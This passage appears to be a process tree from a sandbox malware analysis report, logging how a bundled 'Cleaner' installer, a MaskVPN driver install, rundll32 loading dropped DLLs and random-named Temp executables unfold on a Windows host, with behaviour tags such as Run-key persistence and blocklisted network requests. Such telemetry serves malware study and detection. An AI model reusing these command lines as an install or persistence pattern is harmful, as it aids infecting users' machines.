                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 5524 -ip 5524
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:6080
                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 712 -p 5476 -ip 5476
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:6100
                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 696 -p 5636 -ip 5636
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:6132
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 1880 -ip 1880
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:5176
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5904 -ip 5904
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:4104
                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 712 -p 5828 -ip 5828
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:5156
                                                                                                                                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:1312
                                                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -pss -s 352 -p 5560 -ip 5560
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                PID:5956
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5348 -ip 5348
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                PID:912
                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:4132
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2960 -ip 2960
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                  PID:5796
                                                                                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                  PID:5844
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5628 -ip 5628
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                  PID:5368
                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5440
                                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                    PID:4732
                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 44B39F24E6D4AFB2E3FCCEAEB0DA5941 C
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                      PID:2808
                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding E30CB9C32AC2EF9E8005C4CEC13AF189
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                      PID:3340
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                        PID:1180
                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding ED79BDBF7AA22062307512997E43139D E Global\MSI0000
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                      PID:3824
                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding B912C8B48319277654BCDA74173AF27A C
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:5248
                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding AC452AD67407E63D925C5D166797D942
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:3764
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:1168
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:1212
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:4552
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x20c,0x210,0x214,0x1bc,0x218,0x7ff870d8dec0,0x7ff870d8ded0,0x7ff870d8dee0
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:4916
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff660669e70,0x7ff660669e80,0x7ff660669e90
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                            PID:2104
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,17308756860800701955,16785557916600862648,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4552_1090683541" --mojo-platform-channel-handle=1884 /prefetch:8
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:3412
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1584,17308756860800701955,16785557916600862648,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4552_1090683541" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1592 /prefetch:2
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:1664
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1584,17308756860800701955,16785557916600862648,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4552_1090683541" --mojo-platform-channel-handle=2072 /prefetch:8
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:3036
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1584,17308756860800701955,16785557916600862648,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4552_1090683541" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2484 /prefetch:1
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:3876
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1584,17308756860800701955,16785557916600862648,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4552_1090683541" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2648 /prefetch:1
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:3544
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1584,17308756860800701955,16785557916600862648,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4552_1090683541" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2864 /prefetch:2
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:5696
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1584,17308756860800701955,16785557916600862648,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4552_1090683541" --mojo-platform-channel-handle=1856 /prefetch:8
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:1484
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1584,17308756860800701955,16785557916600862648,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4552_1090683541" --mojo-platform-channel-handle=3468 /prefetch:8
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:5964
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1584,17308756860800701955,16785557916600862648,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4552_1090683541" --mojo-platform-channel-handle=3488 /prefetch:8
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:5820
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1584,17308756860800701955,16785557916600862648,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4552_1090683541" --mojo-platform-channel-handle=3584 /prefetch:8
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:5620
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1584,17308756860800701955,16785557916600862648,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4552_1090683541" --mojo-platform-channel-handle=3652 /prefetch:8
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:3620
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_BF1A.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:4600
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4936 -ip 4936
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:4676
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                          PID:1180
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:772
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 772 -s 456
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                                              PID:2156
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 772 -ip 772
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:4268
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                          PID:5276
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                          PID:1528
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:5840
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 456
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                              PID:2084
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5840 -ip 5840
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:2796
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1280 -ip 1280
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:1916
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:5736
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                              DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4ab8299b-ad42-6143-9dbb-045888aaec38}\oemvista.inf" "9" "4d14a44ff" "00000000000000F0" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:2612
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "00000000000000F0" "ef92"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:4440
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:4480
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:2532
                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:4172
                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                        MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:2312
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3792 -ip 3792
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:3184
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1528 -ip 1528
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:4472
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1300 -ip 1300
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:680
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2516 -ip 2516
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:2640
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1644 -ip 1644
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:824
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4148 -ip 4148
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:4476
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4600 -ip 4600
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:4928
                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:3600
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7F4D.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7F4D.exe
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:3236
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 300
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                            PID:5756
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\898F.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\898F.exe
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:4872
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 296
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                              PID:2296
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\B43A.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\B43A.exe
                                                                                                                                                                                                                                                                                                                            1⤵
